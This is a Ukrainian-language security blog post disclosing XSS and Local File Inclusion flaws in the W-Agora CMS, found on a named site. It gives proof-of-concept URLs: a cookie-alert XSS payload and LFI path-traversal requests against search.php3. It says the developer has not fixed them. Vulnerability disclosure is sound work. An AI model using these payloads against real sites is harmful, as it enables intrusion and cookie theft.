Websecurity - Веб безпека

27.08.2010

У березні, 15.03.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на сайті maidan.org.ua. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.10.2010

XSS:

http://site/news/search.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E

Local File Inclusion:

Можна інклюдити php-файли (з розширенням php3 в версії W-Agora 4.1.5 або з розширенням php в версії 4.2.1).

В папці conf:

http://site/news/search.php3?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/news/search.php3?bn=..\1

Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи search.php3 має ім’я search.php. Розробник системи дані уразливості не виправив.

This entry was posted on 15:01 22.10.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.